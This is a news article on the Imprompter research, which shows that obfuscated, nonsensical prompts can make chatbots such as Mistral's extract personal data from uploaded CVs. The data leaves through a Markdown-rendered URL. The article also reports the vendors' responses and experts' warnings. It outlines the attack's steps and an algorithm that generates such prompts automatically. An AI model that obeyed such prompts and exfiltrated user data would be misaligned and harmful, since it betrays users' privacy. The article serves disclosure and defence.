In Short:
Researchers have shown that AI chatbots can be tricked into revealing personal information through misleading prompts. They tested this by uploading CVs, leading to serious privacy risks. Mistral AI responded by fixing the issue, while experts warn that as AI usage grows, the potential for attacks increases. Users should be cautious about sharing information and using online prompts.
Recent research has unveiled significant vulnerabilities related to the use of chatbots, particularly in how they handle personal data through user-uploaded documents such as CVs. The study indicates that if an attack were conducted in a real-world scenario, individuals could fall victim to social engineering tactics, leading them to believe that an unintelligible prompt would yield beneficial outcomes, such as enhancing their CV. The researchers referenced various websites that offer users prompts, and during testing, they discovered that a CV uploaded to chatbot conversations could yield personal information contained in that file.
Research Insights
Earlence Fernandes, an assistant professor at UCSD and a contributor to the study, described the complexity of the attack method. According to Fernandes, the obfuscated prompt must accomplish several tasks: it needs to identify personal information, generate a functional URL, apply Markdown syntax, and operate without revealing its malicious intent to the user. He parallels this type of attack to traditional malware, emphasizing its capability to perform unintended actions without the user’s knowledge.
“Typically, you would need to write extensive computer code to accomplish this in conventional malware,” said Fernandes. “In this case, it’s intriguing that all of that functionality can be encapsulated within a relatively brief and nonsensical prompt.”
Mistral AI’s Response
In response to the findings, a spokesperson for Mistral AI acknowledged the importance of security researchers in enhancing user safety. “Following this feedback, Mistral AI promptly implemented the appropriate remediation to address the situation,” the spokesperson stated. The company classified the issue as having “medium severity” and introduced a fix that prevents the Markdown renderer from functioning and restricts the capability to call external URLs, effectively disabling external image loading.
Fernandes noted that the update from Mistral AI may mark one of the first instances in which an adversarial prompt led to a corrective action on an LLM product, rather than merely filtering out the prompt. He cautioned, however, that restricting the capabilities of LLM agents could ultimately be “counterproductive.”
Commitment to Security
Meanwhile, the creators of ChatGLM released a statement asserting that they have established security measures to safeguard user privacy. “Our model is secure, and we have consistently prioritized model security and privacy protection,” the statement emphasized. “By open-sourcing our model, we aim to leverage the strength of the open-source community to thoroughly inspect and evaluate all aspects of these models’ capabilities, including security.”
A High-Risk Activity
Dan McInerney, the lead threat researcher at security firm Protect AI, remarked on the Imprompter paper’s significance, which describes an algorithm for autonomously generating prompts that can facilitate various exploitations, including the exfiltration of personally identifiable information (PII), image misclassification, and malicious utilization of tools accessible to LLM agents. While some of the attack methods outlined may mirror previous techniques, McInerney emphasized that the algorithm unites these approaches. “This represents a progression in automated LLM attacks rather than merely identifying new vulnerabilities,” he explained.
He further cautioned that as LLM agents gain widespread adoption and individuals grant them increased authority to perform actions on their behalf, the potential for attacks intensifies. “Deploying an LLM agent that accepts arbitrary user input should be regarded as a high-risk activity, necessitating extensive and innovative security testing prior to rollout,” McInerney stated.
For organizations, this underscores the necessity of comprehending how an AI agent interacts with data and identifying potential abuse vectors. On an individual level, similar to general security advisories, users should carefully consider the extent of personal information they disclose to any AI application or company. Moreover, if utilizing prompts sourced from the internet, it is crucial to exercise caution regarding their provenance.